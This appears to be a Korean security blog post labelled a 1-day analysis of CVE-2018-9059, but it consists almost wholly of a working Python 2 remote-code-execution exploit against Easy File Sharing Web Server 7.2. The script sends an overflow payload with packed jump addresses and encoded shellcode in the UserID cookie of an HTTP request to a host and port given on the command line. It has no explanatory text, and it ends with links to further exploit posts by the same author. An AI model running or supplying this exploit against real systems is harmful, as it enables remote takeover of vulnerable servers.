ii4gsp
[1-day Analysis] CVE-2018-9059 - Easy File Sharing Web Server 7.2 Exploit (RCE) 본문
시스템 해킹/Windows Pwnable
[1-day Analysis] CVE-2018-9059 - Easy File Sharing Web Server 7.2 Exploit (RCE)
ii4gsp 2021. 1. 25. 19:44import socket
import struct
import sys
def exploit(HOST, PORT):
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
payload = ''
payload += 'A' * 4059
payload += struct.pack("<I", 0x909006eb)
payload += struct.pack("<I", 0x100103fe)
payload += shellcode
payload += '\x90' * 200
buffer = (
"GET /forum.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0\r\n"
"Host:" + HOST + ":" + str(PORT) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + HOST + "/\r\n"
"Cookie: SESSIONID=22484; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(buffer)
s.close()
print '[+] Exploit'
except Exception:
print '[-] Exploit Failed'
if __name__ == '__main__':
if len(sys.argv) <= 1:
print '[-] python2 exploit.py [HOST] [PORT]'
exit()
exploit(sys.argv[1], int(sys.argv[2]))
'시스템 해킹 > Windows Pwnable' 카테고리의 다른 글
VUPlayer 2.49 Exploit (Local) (0) | 2021.01.04 |
---|---|
CoolPlayer 2.19.2 Exploit (Local) (0) | 2020.12.30 |
Easy Chat Server 3.1 Exploit (RCE) (0) | 2020.12.30 |
부분 Overwrite (0) | 2020.04.22 |
Integer Overflow Exploit (0) | 2020.04.20 |
Comments